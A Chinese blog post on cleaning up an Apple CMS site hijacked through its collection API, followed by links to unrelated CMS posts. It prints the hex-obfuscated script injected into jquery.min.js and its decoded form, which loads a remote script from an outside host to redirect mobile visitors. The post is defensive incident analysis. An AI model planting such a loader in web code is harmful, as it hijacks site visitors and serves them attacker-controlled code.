网站被挂马跳转劫持跳转到H APP下载页。 被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。 挂马图片 通过日志查看挂马过程 该漏洞是利用苹果CMS的API执行SHELL, 挂马文件在模板的jquery.min.js ;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73’;head.appendChild(script);
解密之后是 var head = document.getElementsByTagName(‘head’)[0];
var script = document.createElement(‘script’);
script[‘src’] = ‘
https://maccms.z23.web.core.windows.net/732d.js’;
head.appendChild(script);
清除代码 关闭后台采集API功能。或自定义API接口名字,
苹果cms最新漏洞被挂马跳转劫持及清除代码
如果没有特点说明,本站所有内容均由原创,转载请注明出处!
相关推荐
-
苹果cms模板phome_enewsshoppayfs帝国CMS商城支付方式表
字段名 字段类型 解释 payid sma...
-
苹果cms模板HTML实体字符ASCII 字符大全
以下是将你提供的内容翻译成中文后的结果: ### ISO 8859-1 字符 支持的 ISO-8859-1 字符完整列表。...
-
苹果cms模板phome_enewshmsg后台站内消息表
字段名 字段类型 解释 mid int(1...
-
苹果cms模板phome_enewsworkflowitem工作流节点表
字段名 字段类型 解释 tid int(1...
-
苹果cms模板使用CSS Grid Generator拖拽生成响应式栅格代码
如果你是CSS小白,不会使用复杂的UI框架,又需要开发一个响应式网站,那么我的站长站推荐你使用CSS Grid Generat...
-
苹果cms模板帝国CMS结合项伪静态字段顺序错误的解决方法
问题 帝国CMS在开发结合项伪静态的时候,我的站长站发现字段顺序错误,如下: 说明:9是栏目ID,0是第一个选项,2是第二...